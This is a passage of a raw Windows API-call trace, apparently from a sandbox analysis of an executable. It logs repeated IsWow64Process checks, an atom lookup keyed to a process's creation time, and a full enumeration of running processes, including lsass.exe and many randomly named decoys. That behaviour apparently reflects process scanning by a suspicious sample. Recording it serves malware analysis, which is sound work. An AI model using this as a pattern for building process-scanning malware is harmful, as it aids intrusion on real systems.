	[0122.102] CloseHandle (hObject=0x698) returned 1
	[0122.102] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.102] CloseHandle (hObject=0x698) returned 1
	[0122.265] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.265] CloseHandle (hObject=0x698) returned 1
	[0122.265] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.265] CloseHandle (hObject=0x698) returned 1
	[0122.265] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.265] CloseHandle (hObject=0x698) returned 1
	[0122.265] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.265] CloseHandle (hObject=0x698) returned 1
	[0122.266] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.266] CloseHandle (hObject=0x698) returned 1
	[0122.266] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.266] CloseHandle (hObject=0x698) returned 1
	[0122.266] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.266] CloseHandle (hObject=0x698) returned 1
	[0122.267] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.267] CloseHandle (hObject=0x698) returned 1
	[0122.267] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.267] CloseHandle (hObject=0x698) returned 1
	[0122.267] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.267] CloseHandle (hObject=0x698) returned 1
	[0122.267] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.267] CloseHandle (hObject=0x698) returned 1
	[0122.267] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.267] CloseHandle (hObject=0x698) returned 1
	[0122.268] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.268] CloseHandle (hObject=0x698) returned 1
	[0122.268] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.268] CloseHandle (hObject=0x698) returned 1
	[0122.268] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.268] CloseHandle (hObject=0x698) returned 1
	[0122.268] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.268] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.269] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.269] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.269] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.269] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.269] CloseHandle (hObject=0x698) returned 1
	[0122.269] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.270] CloseHandle (hObject=0x698) returned 1
	[0122.270] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.270] CloseHandle (hObject=0x698) returned 1
	[0122.270] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.270] CloseHandle (hObject=0x698) returned 1
	[0122.270] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.270] CloseHandle (hObject=0x698) returned 1
	[0122.270] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.270] CloseHandle (hObject=0x698) returned 1
	[0122.271] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.271] CloseHandle (hObject=0x698) returned 1
	[0122.271] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.271] CloseHandle (hObject=0x698) returned 1
	[0122.271] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.271] CloseHandle (hObject=0x698) returned 1
	[0122.271] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.271] CloseHandle (hObject=0x698) returned 1
	[0122.271] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.271] CloseHandle (hObject=0x698) returned 1
	[0122.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.272] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.272] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.272] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.276] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.276] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.277] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.277] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.277] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.277] CloseHandle (hObject=0x698) returned 1
	[0122.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.277] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.277] CloseHandle (hObject=0x698) returned 1
	[0122.277] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.277] CloseHandle (hObject=0x698) returned 1
	[0122.277] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.278] CloseHandle (hObject=0x698) returned 1
	[0122.278] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.278] CloseHandle (hObject=0x698) returned 1
	[0122.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.315] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d628, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.322] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.322] CloseHandle (hObject=0x698) returned 1
	[0122.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.323] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.323] CloseHandle (hObject=0x698) returned 1
	[0122.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.324] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.324] CloseHandle (hObject=0x698) returned 1
	[0122.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.324] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.324] CloseHandle (hObject=0x698) returned 1
	[0122.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.324] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.324] CloseHandle (hObject=0x698) returned 1
	[0122.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.328] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.328] CloseHandle (hObject=0x698) returned 1
	[0122.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.329] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.329] CloseHandle (hObject=0x698) returned 1
	[0122.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.329] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.329] CloseHandle (hObject=0x698) returned 1
	[0122.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.330] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.330] CloseHandle (hObject=0x698) returned 1
	[0122.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5ad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.330] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.330] CloseHandle (hObject=0x698) returned 1
	[0122.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.330] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.330] CloseHandle (hObject=0x698) returned 1
	[0122.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.331] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.331] CloseHandle (hObject=0x698) returned 1
	[0122.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.331] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.331] CloseHandle (hObject=0x698) returned 1
	[0122.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d618, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.331] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.331] CloseHandle (hObject=0x698) returned 1
	[0122.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.332] CloseHandle (hObject=0x698) returned 1
	[0122.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9820, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.332] CloseHandle (hObject=0x698) returned 1
	[0122.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.333] CloseHandle (hObject=0x698) returned 1
	[0122.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.333] CloseHandle (hObject=0x698) returned 1
	[0122.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.333] CloseHandle (hObject=0x698) returned 1
	[0122.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.334] CloseHandle (hObject=0x698) returned 1
	[0122.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.334] CloseHandle (hObject=0x698) returned 1
	[0122.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.334] CloseHandle (hObject=0x698) returned 1
	[0122.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.335] CloseHandle (hObject=0x698) returned 1
	[0122.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b99d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.335] CloseHandle (hObject=0x698) returned 1
	[0122.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.336] CloseHandle (hObject=0x698) returned 1
	[0122.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.336] CloseHandle (hObject=0x698) returned 1
	[0122.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.336] CloseHandle (hObject=0x698) returned 1
	[0122.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.337] CloseHandle (hObject=0x698) returned 1
	[0122.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
